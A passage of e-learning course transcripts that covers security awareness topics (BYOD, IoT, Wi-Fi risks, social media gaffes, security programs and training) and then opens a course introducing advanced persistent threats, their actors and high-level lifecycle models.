it's physical or digital. And most importantly, you trust the party you're sharing the
information with to not put you in a compromising situation.
So how do you establish trust on all those levels? Well, an organization that has a
clear and unambiguous policy, has secure methods and processes and honors a
culture of never bending the rules, is well positioned to avoid the embarrassment
and legal exposure related to costly data breaches.
BYOD and IoT
[Video description begins] Topic title: BYOD and IoT. Your host for this session is
Jamie Campbell. [Video description ends]
In this video, I'll discuss BYOD and IoT and how they pose a unique security threat
for organizations. BYOD, or Bring Your Own Device, and IoT, or Internet of
Things, each represent a fairly new and unprecedented attack surface for
organizations. So I would like to drill down a bit into it and discuss why they
matter.
First, Bring Your Own Device, it's been around for a while but before 2007 when
the iPhone was first released, personal devices weren't as much of an issue. Before
then we had mobile phones with limited capabilities and, perhaps, laptops, personal
laptops people could bring to work. But I think most companies provide work
laptops. Blackberries were really the only outlier, but they weren't using Wi-Fi to
connect to company networks, at least not at the time.
Other handheld devices, PDAs mostly, didn't offer much or any connectivity. In
any event, all that changed when the iPhone rolled out a year later by Android
connectivity, followed by Android smartphones, and to a lesser extent, Windows
phones.
Things exploded pretty quickly, and now we have these ultra powerful handheld
computers and phones and tablets, and even wearable devices like watches. This
led companies to either disallow personal mobile devices from connecting to the
network, and it also led to companies seeing an opportunity. The term BYOD was
born sometime around 2013, I think, but it could be earlier than that.
[Video description begins] Icons for BYOD checklist, handheld devices, and
wearable devices display. Screen title: Benefits of BYOD [Video description ends]
The opportunities they recognized include the way that these devices take
advantage of mobile technologies. The Blackberry was pretty revolutionary when it
came out in the early 2000s, because having email on the road was pretty darn
useful. Smart phones upped the ante by providing this as well as web surfing and
any conceivable function you could package into an app. This gave rise to greater
employee efficiency because of the additional work tasks they could perform when
on the move.
And having your personal device, your own device, added a comfort level for most
people. Being able to use the same device for personal purposes without having to
switch to a different device for work purposes has its benefits. And all that makes
employees happy and we all want to make our employees happy. But there are
drawbacks to BYOD, which is why some companies disallow it. A secure network
is only as secure as its weak points, and mobile security has been missing in action
for the most part, only becoming a thing in the past few years.
And even with legitimate security software, users can install apps, and apps have
their own problems in terms of security. For example, why would a free poker app
need access to your contacts or telephone? Now, I made that up but there are plenty
of real examples of apps requesting access for functions they probably shouldn't
have access to. And there's an exponential aspect to personal mobile devices.
[Video description begins] Third bullet appears. It reads: Adds attack vectors
exponentially. [Video description ends]
Think about this, 20 years ago, we had a desktop computer at work, maybe a laptop
if we spent time on the road, that was it. The only things that connected to the
company network, and they were company-owned devices that were made secure
by IT. Today, you can have a desktop computer and a laptop and a tablet and a
smart phone and a smart watch, all connecting to the wireless network at the office.
That's not a stretch to imagine because we're actually seeing it, and that means
we're exponentially growing the attack surface by adding more vectors. Then
there's a cost to BYOD. It's often suggested that letting employees use their own
devices can mean the company doesn't have to purchase one for them. Everyone
has a smart phone these days so why not save by allowing them to have access to
the company network?
But reality is that the total cost of ownership has grown significantly for mobile
devices, even if the personal devices are not company owned. More devices, again,
remember the number of devices has grown exponentially, means more demand on
network bandwidth, especially with multimedia. And security hardware and
software has to be expanded due to greater bandwidth requirements and a larger
attack surface. So you really have to balance the cost of BYOD versus a lot of the
benefits that it brings in terms of working in an office environment.
Let's turn to the Internet of Things, or IoT. This is newer than BYOD, but no less
troublesome for security professionals, more so in some ways. In the past ten years,
devices and appliances have got smarter by becoming network aware. That is, you
can now plug a device into the Internet that you couldn't have before, things like
smart appliances, Internet connected fridges, for example.
Wearable technology like smart watches, smart TVs with apps have been around
for some time now, and there are also smart cars, too. They can connect. Smart
buildings with network aware systems like lighting or heating, all these things
increase the attack surface even further than before.
[Video description begins] A graphic displays. It shows the various IoT
applications. The labelIoT applications displays in the center of the circle and
arrows project outwards from this circle and point to the 5 major IoT applications:
smart appliances, smart TV, smart car, wearables, and smart buildings. [Video
description ends]
So what are the benefits of IoT? Well, the integration of technology into other
devices has proven awfully useful. Devices have become smarter, performing tasks
for us that help in a multitude of ways, controlling lighting systems in a building to
reduce energy and save money, installing apps on the TV in the boardroom to, say,
review the company's YouTube channel.
There are plenty of benefits to smart technology, making them more useful. And
smart technology also enables big data. For example, collecting all the information
about an organization's energy usage for lighting and heating over a period of time
and using data analytics to find better ways. And that extends out to sensor data for
companies that use sensors to monitor usage, equipment, machinery, inventory or
some other aspect of the business.
But there are drawbacks to IoT. As the number of connected devices grow they'll
find their way inside company networks, and this represents a massive increase in
an already growing attack surface. And little to no security in these devices is a
problem that's going to have to be fixed, the sooner the better. There are thousands
of different vendors making connected devices, and everything we've been seeing
is that there's little or no agreement on how the software for these devices should be
created or secured.
In fact, it's pretty much accepted by the security world right now that the software
or firmware for these devices is often cobbled together with little or no attention to
security and even less attention to updating that firmware. And what about this? Do
we know if information is being collected by these devices and sent back to the
device manufacturer? Is there a way to track this? Because in addition to the
potential security hole, there's a bandwidth problem, too. Now fortunately, we can
track this but still it adds an extra layer of complexity.
[Video description begins] Screen title: BYOD and IoT [Video description ends]
So it's a mixed bag of the good and the bad, but here's the truth for you. Like most
technologies, we can't simply ignore BYOD and IoT. In addition to the ways these
phenomena benefit organizations, organizations also need to be aware of the risks,
must implement policies, and must educate management and personnel to the risks
and proper usage of devices.
Wireless Networking Challenges
[Video description begins] Topic title: Wireless Networking Challenges. Your host
for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the challenges surrounding wireless networking and how
wireless networks should be handled on an organizational scale.
[Video description begins] Screen title: Challenges of Wireless Networking [Video
description ends]
Wireless networking has been largely beneficial to organizations, mostly because
employees are no longer tethered to their desks. I really don't think you can
overstate the benefits because technology keeps getting more powerful and more
useful. But there are dangers, so what are they? Wireless networking cut the cord
back in the early 2000s, and that enabled companies in ways they couldn't imagine
before.
Before that we started with desktops and laptops that were physically connected to
the network. And if you took a laptop home or on the road, it was little more than a
word processor or spreadsheet program. You know lacking connectivity presented
limitations. Even with modems it was still fairly clunky. Greater flexibility in
placement of connected devices, the ability to add devices like smart phones and
tablets, handheld computers. Wireless added greater flexibility by adding wireless
connected devices. Devices like smart phones and tablets, finally, handheld
computers.
[Video description begins] A graphic displays to show the evolution of wireless
networking over the years. On the right side of the graphic, the earlier networking
system displays. It consists of work stations - personal computers or laptopsconnected to each other via wired networks. On the left side of the graphic, the
present networking system displays. It consists of mobile devices connected via
wireless systems. [Video description ends]
And I'm old enough to remember when quote, unquote handhelds began appearing
in the 90s and even into the early 2000s. And looking back, it was pretty laughable
because those devices were expensive and not terribly useful. But when the devices
became smaller, more powerful, and included wireless transceivers, then things
really started cooking. However, the net result of this growth is an ever-growing
attack surface.
And Wi-Fi represents more than just an attack surface which is a headache for IT
professionals. They're more accessible, they fit in our pockets so they're susceptible
to being lost or stolen. They're rarely configured well, mostly because they work
out of the box and navigating a smart phone settings is like being swarmed by bees.
Because they can connect to any wireless signal, they can be hacked.
Guest networks, the kinds you find in many wireless hotspots are troublesome.
Because they usually lack any meaningful security measures that protect your data.
And in a wireless environment that's connected to a corporate network, the
network's data needs to be locked down tightly. There is no room for error here
when a connection to your network can be made by a stranger sitting in the lobby.
[Video description begins] Screen title: Mobile Devices are Risky [Video
description ends]
The devices themselves represent risk. If your organization encourages BYOD,
bring your own device so you can connect at work, then are those devices secured?
Do they take advantage of the lock technology built into modern phones and
tablets?
Most of these devices offer poor security or none at all. It’s up to the phone
manufacturer, if they do provide security, you’re paying for it. And the cheaper
phones usually contain little to no security software because that’s how they keep
the price down. Every vendor is different and even their lines of phones are
different. So having everyone use their own personal devices can be pretty much a
nightmare.
And antivirus software is sometimes overlooked by vendors, although people can
download apps to provide some malware security. Which leads to the question,
what if a device is infected by a malware? Can that malware spread if it connects to
the organization's network? It's a question that we have to ask.
[Video description begins] Screen title: Challenges of Wireless Networking [Video
description ends]
So I'll leave you with this. Along with policies for both BYOD and IoT,
organizations have to have a clear policy relating to Wi-Fi, Bluetooth, and mobile
devices. Whether they're personal or corporate owned. And I highly recommend
training for personnel to understand the risks specific to mobile connectivity.
Posting on Social Media
[Video description begins] Topic title: Posting on Social Media. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the dangers of posting on social media by providing some
real world examples. Social media has its benefits, but we've seen plenty of
examples of how it
[Video description begins] Screen title: Posting on Social Media [Video
description ends]
can be abused, and misused, creating costly human mistakes. I always remind
people when they post on social media that these posts can be deleted, but they're
never completely removed and the damage may already have been done. They
won't be forgotten. So, in that spirit, let's take a look at some of the well known
social media gaffes made by companies and I'm not going to name names.
In 2016, a major airline retweets a post and that post was a promotion by one of its
competitors. Now not the most harmful thing ever done on Twitter, but it caused a
lot of comical responses and was a clear embarrassment for the poster.
In 2014, users posted fears online that the new and slim iPhone 6 may bend if you
put it in your pocket and sat down. One of Apple's competitors trolled the company
by tweeting a photo of its new phone noting that their's were intentionally curved.
The problem at the bottom of the post was the message via Twitter for iPhone.
In 2018, in response to a Twitter question by a customer, a wireless provider
confirmed that it stored its user passwords in plain text. And that customer service
reps could see the first four characters. To make matters worse, the wireless
company employee also included the statement that they didn't see the problem
with this practice. The internet blew up over this one and five days later, the
company announced that it would start hashing and salting passwords.
Again in 2018, a sports equipment manufacturing company sent out an email to
subscribers who participated in the Boston Marathon. With the subject line,
Congrats, you survived the Boston Marathon. While this wasn't done on social
media, people quickly turned to social media with screenshots of the email,
prompting a quick apology by the company.
In 2014, a clothing company shared an image with the hashtag smoke and clouds
on a national holiday. The idea being, enjoy the fireworks. The problem, the image
was that of the 1986 explosion of space shuttle Challenger. The company was
forced to apologize.
And those are just a few examples. You can find plenty of embarrassing or
downright costly social media posts. And my takeaway is that there's no substitute
for a clear and unambiguous policy. But more than that, organizations should
always have a small footprint of trained professionals as their social media posters.
These people are trained not only in social media best practices, but also in
marketing communications and it's best to leave the messaging to the pros.
The Importance of Security Programs
[Video description begins] Topic title: The Importance of Security Programs. Your
host for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of implementing organizational security
programs and why companies that don't have them put themselves at risk.
[Video description begins] Screen title: The Importance of an Information Security
Program [Video description ends]
Every organization needs an information security program. But it's not uncommon
for employees and management to fail to see the need. That's okay. Let's go
through it and we'll discuss why an information security program defines the
processes and activities of an organization. It also creates boundaries and protects
assets and information. Ultimately, an information security program ensures that
the organization's risk is as low as possible.
In information security we talk about the CIA Triad as the first thing you learn.
And we're not talking about spies, we're talking about confidentiality, integrity, and
availability. As a triad, each of these elements is as important as the next one, but
each play a key role in organizational information security.
[Video description begins] A graphic displays. It shows the elements constituting
an interconnected triad, CIA, of information security. CIA stands for
Confidentiality, Integrity, and Availability. [Video description ends]
Confidentiality refers to privacy, keeping information private. Integrity refers to the
soundness or completeness of the data. And availability refers to the need for
constant uptime for that data.
[Video description begins] Screen title: Elements of an Information Security
Program [Video description ends]
An information security program establishes policies and defines risks. It's a
program that evolves over time, doing this by monitoring threats and when
necessary, responding to attacks. Generally, this is how information security
program is established although every organization is different.
So there maybe more steps depending on the company. You start by identifying
your sensitive assets, the information that needs to be kept safe and secure. This
should be an extensive and detailed list of everything. And while it's not
uncommon to grade the information on its level of sensitivity, all information
should be considered at some sort of risk.
And you have to understand what the risks are. What happens if this particular kind
of information gets out? How would it harm us and what will it cost? A good
program should define the gatekeepers, the roles and people who are responsible
for the information including its release. And a program always needs to have a
response plan with well-defined steps for what to do in the event of a breach.
[Video description begins] Screen title: The Importance of an Information Security
Program [Video description ends]
All this is crucial because you as an organization and as a member of the
organization have responsibilities to different entities. First, to customers and
suppliers, especially if some of the information you are guarding is their
information. Then there is the financial risk represented by a breach, and it's not
cheap. Your organization may have regulatory responsibility even if you didn't
know that you did.
Privacy laws, particularly GDPR, make personal information gathering and
dissemination a risky venture if you're not prepared or don't understand your
responsibility. And in lockstep with that is the legal responsibility which can be
scary if you're required by law to protect certain information. What laws apply to
your company can be contingent on the kind of business you're in.
For example, in addition to general privacy laws, there are laws specific to financial
institutions, healthcare providers, and educational institutions. And all this is to say
that an information security program is designed to protect a company and
minimize its liability by reducing the risks associated with information gathering.
Employee Training, Awareness, and Advocacy
[Video description begins] Topic title: Employee Training, Awareness, and
Advocacy. Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss how employee training, awareness and advocacy should
be implemented. And how it plays a crucial role in the protection of an
organization's information.
[Video description begins] Screen title: Employee Training, Awareness, and
Advocacy [Video description ends]
Employee training sometimes gets overlooked. Or more commonly, it doesn't cover
or doesn't cover comprehensively enough many important aspects of information
security. But every employee in an organization, from top to bottom, is responsible
for securing sensitive information, no exceptions. Because like a network's attack
surface, the riskiest attack vectors are the weak points. So why should you have
training?
First, knowledge is power. We know that hackers believe this and live by that
mantra, so we have to fight fire with fire. And I've seen this more times than I care
to admit. IT people sort of make the mistake of thinking that everyone in the
organization thinks the way they do. But non-IT personnel are there to do their job
and they don't intuitively know what the risks are. So they have to, they often want
to, be informed.
An organizational policy needs to be explained, not just what's in it but why it's
there at all and what might happen if it's not honored. Ultimately employees need
security training because they need to understand the dangers and how they can do
their part to help. What about awareness? This is different than training which
normally occurs in a single session or a limited number of sessions.
But then employees go back to their work and they don't always keep their antenna
up. It needs to be imparted to them that the dangers are very real, and that people
make mistakes. We all do and hopefully they're not disastrous mistakes, but being
aware of this can help them avoid mistakes. They need to be aware that hackers
won't wait for you to get your game together. They'll attack when you're at your
weakest.
And normally, some of these attacks come through unsuspecting employees who
weren't made aware of the risks. And keep in mind that awareness is contagious. If
you have a culture of awareness in your organization, it can spread. Because people
talk and hopefully people will have their colleagues' backs. Pointing it out when
some sort of risky behavior is detected and before it becomes a disaster.
[Video description begins] Screen title: Why Advocacy? [Video description ends]
Advocacy is an extension of awareness because now you're spreading the word. It's
important to share in experience and knowledge, things like, hey, did you hear
about this email spoofing campaign? No, no I didn't, but I just got this weird email
from my own account. Simply put sharing knowledge makes us all better. It helps
promote the organization too.
You can use that culture awareness as a selling feature, a way to show your
customers that you're committed to protecting their information. It also builds
confidence, because once again, knowledge is power. So how does an organization
go about implementing training, awareness, and advocacy?
It always begins with a clear and unambiguous policy that lays out in detail what
your goals are and how you intend to get there. Organizations need to identify
leaders from their employee ranks, those who can assist others in becoming aware.
In addition to general training, there should be train the trainer focus because you
really want to have those leaders well armed. And a general training session won't
cut it if you want them to be successful.
Finally, training is an ongoing process because technology changes and hackers
evolve. They become more sophisticated with new tools and methodologies. In
order to be a well armed organization in the war on hacking, we need to stay on top
of things.
Balancing Up-Front Costs vs. Downtime in the Future
[Video description begins] Topic title: Balancing Up-Front Costs vs. Downtime in
the Future. Your host for this session is Jamie Campbell. [Video description ends]
In this video, I'll discuss the importance of balancing up-front costs versus
downtime in the long run.
[Video description begins] Screen title: Balancing Costs vs. Downtime [Video
description ends]
Balancing the cost of implementing strong security programs with the cost of
downtime shouldn't be a problem for companies. Gartner found that on average, the
cost of network downtime to organizations was $5,600 per minute or $336,000 per
hour. And other Gartner studies have suggested that network downtime ranges
from $140,000 to more than a half million dollars per hour. These figures alone
should make an iron clad case for investing in better security.
And system interruptions can affect your staff and their work effectiveness. Work
interruption can waste up to 6 hours per day. And it could take employees 23
minutes and 15 seconds to recover from interruptions. And interruptions eat up 28
billion people hours a year and cost the US economy a trillion dollars a year. So
what are some of the costs associated with network downtime?
First, wages, a company still has to pay people, even if the company itself isn't
generating revenue due to network failure. A company's reputation, often difficult
to put into hard and fast numbers, but we have plenty of examples of how
reputation has led to lost revenue. There's also lost revenue in the business that's
not being done during a failure.
And the worst case scenario, a failure could result in legal action by customers and
suppliers. There could be penalties and fines if a failure somehow breached
regulations and laws. There's the potential cost of reparations over and above lost
revenues. A company may have to hire outside consultants in order to determine
how this happened and how to avoid it in the future. And failures can indicate that
additional equipment and software may need to be purchased.
[Video description begins] Screen title: Balancing Up-Front Costs vs.
Downtime [Video description ends]
It can be costly to lose a network, even for a brief period of time. It's called disaster
recovery for a reason, it can be disastrous. But companies that know how much
downtime costs them, whether they're in the profit or non-profit space, can plan
better for disaster recovery because they understand the cost of doing nothing.
Convenience vs. Security
[Video description begins] Topic title: Convenience vs. Security. Your host for this
session is Jamie Campbell. [Video description ends]
In this video, I'll discuss how new technology impacts security and how to balance
convenience and security.
[Video description begins] Screen title: Convenience vs. Security [Video
description ends]
I love this quote because it speaks truth. In the security industry, everybody used to
believe that to be secure, something couldn't be convenient. Security and
convenience functioned only in opposition to each other. Making access hard was
the best way to keep information safe. But then we ran up against the human factor,
and that's an important point. Convenience isn't just important because it's
convenient. People need convenience for a variety of reasons, and that's no truer
than in the tech space.
[Video description begins] Screen title: How New Technology Affects
Security [Video description ends]
We know that new technology has a direct and immediate impact on businesses and
there's no doubt that the dramatic increase in the number and kinds of devices that
can connect to a corporate network has expanded the attack surface. But how does
new technology affect people?
[Video description begins] The same diagram depicting the evolution of networking
system displays. But now each side has shaded area, which is labelled as Attack
surface. [Video description ends]
The obvious answer is that new technology makes a user's life easier, making tasks
simpler or more efficient. But on the flip side, new technology makes it easier for
hackers because we're growing the attack surface and they're making new and
better hacking tools. In the middle are the security professionals.
And yes, it makes their lives harder because they need to cater to their users and
help them use the technology, while at the same time remaining vigilant in
protecting the network. And this has another impact on management, because they
have to understand the issues, the employees, the risks, and what IT needs in order
to be successful.
[Video description begins] Screen title: Convenience vs. Security [Video
description ends]
As Bruce Schneier points out, changes in technology affect both the attacker and
the users. New technologies cause a decrease in what he calls the scope of
defection, that is, what attackers can get away with. And attackers are using new
technologies to increase the scope. This is an ongoing issue and the importance of
understanding the delicate balance is required cannot be overstated. So how do we
balance that growth with convenience and make it easier for employees to work in
a secure environment? It helps to understand some basic concepts and work out
from there.
First, owners and IT administrators need to come to grips with the premise that
convenience is not a bad thing. All the while security has to be honored. We have
to understand that security is not bad. And we need to impart that on management
and employees. We can find a balance if all parties are on the same page. And often
that page is where we start with policy, which guides everything in the ultimate
goal of protecting the organization and the people who work for it.
Exercise: Explain How to Protect Your Information
[Video description begins] Topic title: Exercise: Explain How to Protect Your
Information. Your host for this session is Jamie Campbell. [Video description ends]
Now that you've learned about protecting your information, it's time to put some of
that knowledge to work. In this exercise, you'll explain how to protect your
information.
You'll explain best practices of email safety. You'll explain how to protect sensitive
data. You'll explain when to share sensitive data, explain the drawbacks of BYOD,
and list the three legs of the CIA triad.
At this point, you can pause this video, and answer these questions. When you're
done, resume the video to see how I would answer them.
Okay, let's answer these questions. It's okay if you didn't answer them exactly the
same way.
[Video description begins] Solution [Video description ends]
First, explain best practices of email safety. Don't open attachments, think before
you click, familiarize yourself with email spoofing, hover over links to view the
actual URL, but don't click them. Don't use personal email for business. Use your
malware scanner. Also, treat your email passwords like every other password, and
keep them secure. Check to see if you've been pwned. Don't enable macros. Learn
how to recognize scams. Understand how URLs work, and protect your email
addresses.
Next, explain how to protect sensitive data. First, use encryption. Store your
information on devices that can be locked. Never share sensitive information over
public networks. Only share that information over secure networks. And for the
most sensitive information, never store it on removable devices.
Next, explain when to share sensitive data. You should only share sensitive data
when you trust the source, when you trust the delivery method, and when you trust
the party you're sharing it with.
Next, explain the drawbacks of BYOD. First, secure networks are only as good as
their weakest point, and so BYOD represents a security risk. It adds vectors
exponentially, and so BYOD increases the attack surface.
Finally, list the three legs of the CIA triad. The three legs of the CIA triad are
confidentiality, integrity, and availability. I hope you found this exercise helpful.
Information Security: APT Defenses
In this 13-video course, discover key Advanced Persistent Threat (APT), concepts
such as defense and best practices. Explore common APT attacks and mitigation
techniques that can be used, APT tools, and how to create effective APT checklists.
You will begin with an introduction to APT and its purpose, then look at the steps
of the APT lifecycle. Learners will examine motives behind an APT and probable
targets, and learn to identify APT defense best practices. Next, you will explore
methods that can be used to strengthen APT defenses, and then recall the method(s)
to deal with APTs. You will then take a look at the Equation aka APT group and its
involvement in various cyber crimes. Another tutorial examines the key tools that
are used when conducting an APT. Define risk assessment processes that can help
you protect your assets. In the final tutorial in this course, you will be asked to
identify key points for creating an effective checklist to address APT attacks.
Course Overview
[Video description begins] Topic title: Course Overview. [Video description ends]
Hi, my name is Ashish Chugh.
[Video description begins] Your host for this session is Ashish Chugh. He is an IT
consultant. [Video description ends]
I have more than 25 years of experience in IT infrastructure operations, software
development, cybersecurity, and e-learning. In the past, I have worked under
different capacities in the IT industry. I have worked as a quality assurance team
leader, technical specialist, IT operations manager, and delivery head for software
development.
Along with this, I have also worked as cybersecurity consultant. I have a bachelor's
degree in psychology and diploma in system management. My expertise are IT
operations and process management. I have various certifications, which are
Certified Network Defender, Certified Ethical Hacker, Computer Hacking Forensic
Investigator. Other than these certifications, I also have few certifications from
Microsoft, which are MCSE, MCSA, and MCP. I am also Certified Lotus
Professional.
In this course, we will understand the concept of APT defenses. We will also be
familiarized with APT defenses best practices. And we'll also look at one of the
APT groups and understand the tools they use in their attacks. We will also learn
about mitigating APT threats.
Later in the course, we will also learn about the concept of APT to end users and
give them various tools to handle APT threats. We will also learn about the
techniques to handle APT attacks. And finally, we'll be able to understand a basic
checklist for addressing the APT attacks.
Advanced Persistent Threat Introduction
[Video description begins] Topic title: Advanced Persistent Threat Introduction.
Your host for this session is Ashish Chugh. [Video description ends]
Advanced persistent threat is a threat by well-funded and highly skilled hackers.
Advanced persistent threat is made up of three components, advanced, persistent,
and threat. What we have to understand is these guys who are part of the advanced
persistent threat, or known as APT, establish their presence deeply within the
organization and are very hard to trace. They continue to move deeper within the
organization systems to find and steal the most valuable information. Going
forward, we will look at what these three components are, advanced, persistent, and
threat.
When you talk about advanced, the APT group uses higher level of sophistications,
which means the tools they use, the kind of skills they have, they are very, very
sophisticated and it is very hard to trace them, it is very hard to stop them. They use
highly advanced methods of attack, which means some of these methods are
virtually unknown and undetectable. This is because they do not use any off-theshelf applications, something like using Metasploit.
Rather, these guys will come up with innovative methods of attacking the target.
They have expert skills and resources. These guys are not the novice or newbies in
the field. They are highly experienced, highly skilled, and very resourceful. This is
because not only they have the skill set but they also have high level of financial
funding.
They use sophisticated and custom tools. These guys do not use any off-the-shelf
tools. They will come up with their own custom tools, which means most of these
guys know how to design a tool. This is because their tools are meant for a specific
purpose. These are not general tools that they use to attack a target. Because they
have a specific motive, this is the reason their tools are customized to fulfil their
needs and successfully attack the target.
Now let's talk about being persistent. In APT threats, the attackers gain access to a
network or a system and remain undetected for a long period of time. The key
intention here is to fulfill their goals and meet their objectives.
One of the key objective that they have is to extract data but not cause any damage.
The reason they do not cause any damage is because damage can attract attention of
the IT team or the security team within the organization. Therefore, they continue
to pursue their goals and they will remain within the system or the network till the
goals are met.
Once the goals are met, they will quietly move out, removing all the traces that can
lead them back to the APTs. So they intend to stay in the target for a long term and
the reason is that they want to fulfil their goal. Their goals are pretty complicated,
like they want to steal data, they want to extract lot of confidential information.
And sometimes this is not easy because of the security controls that have been
implemented or there is defense in depth. Therefore, they might take a little longer,
and for this they have to stay a little longer than the usual time.
Now let's talk about threats. APT typically targets any large organization or
enterprises that have intellectual property, secrets, design, critical business
information, which is very valuable. APTs can also target political organizations
for political motives. They can also spy on the governments and they can also track
high-level individual activities. Some even target critical infrastructure of the
nation states, such as power grids or even the nuclear capabilities.
This means these APTs are motivated, they are skilled and persistent. Motivation is
that they have a specific target in mind, skilled is that they use their skill set to
achieve the motive, and persistent is they do not stop till the time their motives are
met. They use coordinated human actions. This means they typically work in a
hierarchical form. There is a division of tasks. So every individual is assigned a
specific set of activities.
It is not like that one individual is going to conduct the complete attack. There are
individuals who are given specific activities, and these activities are given to the
individual so that one person is not overloaded and one person does not need to
have the complete knowledge of the attack. Specific individuals do specific
activities, and then the entire attack is coordinated in this manner.
They have capability and the intent. This is because these guys could be nation
states, these guys could be anybody who is well funded to conduct this kind of
attack. So not only they have the capability but they also have the intent.
Remember, APTs do not work without an intent. If there is no intent, there is no
attack conducted by the APTs.
APTs are resourceful and well funded. They need to have quite a bit of
infrastructure to conduct such attacks which are very deep into the organizations
and systems, and they need to have lot of resources. So for instance, they develop
their own custom tools. The custom tools cannot be developed if there are not
resources available, and resources can only be made available if they are well
funded. So there are countries and organizations who often fund the APTs to
conduct a large-level attack.
Let's now look at some of the APT actors. When you talk about nation states, these
guys are well funded to steal intellectual properties and even the defense secrets.
They are focused on to hacking into military and diplomatic data and now even
started to attack the industries.
The next one in the list is organized crime group, which is mostly after the money.
They are mainly focused on commercial or social goals. Then, hacktivists have a
political or a social reason. Then there is another one which is known as corporate
espionage group, which goes after competitors for critical information gain. [Video
description begins] The following information is displayed on screen: Corporate
espionage actors. [Video description ends] And these are mostly sponsored by one
corporate to conduct an espionage attack on the competitor.
Then you have terrorists who have political or specific agenda and are often funded
by a country or a well-funded group of people. Let's now look at some of the
characteristics of APTs. They use sophisticated tools and techniques. As we
discussed in the past, these guys design their own custom tools which are highly
sophisticated, which are not available for public. And the group basically owns
these tools. And how the tools work, these techniques are only known to the APTs.
They use social engineering. Social engineering is the base of most of the attacks.
Whether it's by APT or any other hacker, social engineering is used as the first
method to get some basic information about the target. And then from there
onwards, hackers or the APT groups move on and conduct the attack.
APTs do not work without an objective. Remember, these are not some general
hackers who are out there to just break into a system or a network and steal
information. APTs have a very well-defined objective and they do not go against
anybody. They will have a specific target, they have a specific motive or an
objective against the target.
Because APTs need lot of money and resources, they are well funded by the
sponsors. APT groups generally does not go out and start breaking into networks or
the systems on their own. They are funded, they are asked to do a specific job.
They are well organized in the form of a hierarchy. Like we discussed in the past,
there is a specific hierarchy that is formed. There is a guy who does one set of jobs,
there is another guy who is doing another set of job. And at the end, they all
combine their actions to conduct this attack.
Let's look at some more characteristics of APTs. They are low-profile attacks,
which means they are not there to cause damage. They quietly move in, take what
they want or do what they have to do, and then they quietly move out. So they
remain very low profile. The benefit of keeping it a low-profile attack is that they
go undetected. They are extremely stealthy and can remain undetected for as good
as six months.
One of the report of cybersecurity stated, they stay undetected for just about 153
days, which is about five months. That's a very long time to do what you want to do
within a network, which means you can virtually do lot of activities like you can do
privilege escalation, you can steal data, you can modify data. But one of the main
thing about APT is that they do not do anything that brings them into light. So they
will do things which are undetected, which are low profile and does not gain
attention of the IT security team.
They do not cause any downtime. Like explained in the previous point, the idea is
not to gain attention. The idea is to fulfill their motive, idea is to stay low profile,
take what you want, and quietly move out. And of course, before you move out,
you remove all the traces that can lead back to you.
You do not follow hit and run method. [Video description begins] The following
information is displayed on screen: Do not usually cause downtime to avoid
detection. [Video description ends] This is what the hackers do. They come, they
cause damage, and then they run away. APTs do not do that. The idea is to remain
undetected, and therefore, they do not have any kind of hit and run method.
Hit and run method basically means that you come, cause damage, gain
everybody's attention, or become noticeable that you are in the network, and then
you try and move out. But APTs do not do that; they will stay very low profile.
Let's now look at some of the well-known APT groups. And these groups are the
most dangerous groups that exist today. One of the topmost group is Equation
Group – we will talk about this group later on – Fancy Bear, Lazarus, and
Periscope. What we have to understand is each group has its own set of tools, it has
its own method of working, and they generally do not use each other's tool unless
or until they shake hands and they come together to form a single attack.
APT Lifecycle
[Video description begins] Topic title: APT Lifecycle. Your host for this session is
Ashish Chugh. [Video description ends]
We will now look at APT lifecycle. What we have to understand is the execution of
an APT is not really different from any other type of security attack. You would
pretty much follow the same steps, and however, the methodology does differ. In a
normal attack, the hacker would perform the attack, take whatever is needed, and
leave in hurry. However, APTs do not really follow this methodology. They tend to
stay longer and do not cause any kind of damage while being in the system, which
means that they can remain undetected for a very, very long time.
In most cases, APTs are defined differently by different companies. However, there
are typically four steps that are there. So there is a preparation step, there is initial
intrusion, and then there are multiple steps that can follow which run in parallel.
Let's look at the typical APT lifecycle.
[Video description begins] A diagram displays. It shows eight boxes. The first box
is labeled "Reconnaissance." The second box is labeled "Initial intrusion to the
system or network." The third box is labeled "Installing the backdoor." The fourth
box is labeled "Obtain user credentials." The fifth box is labeled "Installing tools
for control." The sixth box is labeled "Perform privilege escalation." The seventh
box is labeled "Perform lateral movement." And the eighth box is labeled
"Maintain persistence." A line connects all eight boxes. [Video description ends]
In most generic senses, if you want to know how APT works, what its lifecycle is,
then there are two steps that are going to be very crucial. So one is the preparation
phase and then the initial intrusion phase. These are the mandatory steps that need
to be performed in a sequence. Beyond this, multiple steps can run in parallel; so
for instance, installing the backdoor. Once that is done, then you have privilege
escalation, lateral movement, installing tools for control, obtain other user
credentials.
Multiple of these things can run in parallel. For example, if you talk about
persistence and access manipulation, both these can happen in parallel along with
lateral movement. And the final step, once the APT lifecycle is completed, then
there is one more step that gets performed and this is the final step which is known
as cleanup.
Let's look at the APT lifecycle defined by Intel. So they largely break this into five
different sections. So there is intelligence gathering, which includes conduct
background research. Then initial exploitation, which includes execute initial
attack, establish foothold. Then they have a third phase which is known as
command and control. So that is enable persistence, conduct enterprise
reconnaissance. And then the fourth phase comes is where they perform privilege
escalation. This includes move laterally to new systems, escalate privileges.
Then finally, is the data extraction phase, which is also known as data exfiltration.
That includes gather and encrypt data of interest and extract data from the victim
system. [Video description begins] The data exfiltration section includes
exfiltrating data from victim system. [Video description ends] And finally, then
they maintain persistence within the system or the network.
Let's look at the APT lifecycle defined by Varonis. Now Varonis defines total of 12
steps within the APT lifecycle. So they start by defining target, find and organize
accomplices, build or acquire tools, research target. So basically if you look at it, in
the other lifecycles that we have seen, the generic and by Intel, the first three steps
did not exist, which is define target, find and organize accomplices, build or
acquire tool. They started from research target or basically doing the initial research
about the target and getting to know what it is about.
Then the fifth is test for detection. So you're able to run various tool to find if there
are live systems on the network. If there are way to detect open ports or services,
then you do the deployment; you deploy various malware or spyware into the
systems. Then that leads you to initial intrusion. And once that is done, once initial
intrusion is done, then you create an outbound connection. This is because you
want to extract the data and send it outside.
Then you expand access and obtain credentials. Finally, you strengthen your
foothold within the systems of the network. You extract data and then you cover
tracks and remain undetected. [Video description begins] According to the slide,
the following is the eleventh step in the APT lifecycle: Exfiltrate data. [Video
description ends] Now this completes the APT lifecycle defined by Varonis.
Now if you go back and check how Intel defined it and how Varonis defined it,
both are different. There are lot of steps which Varonis defines which Intel did not
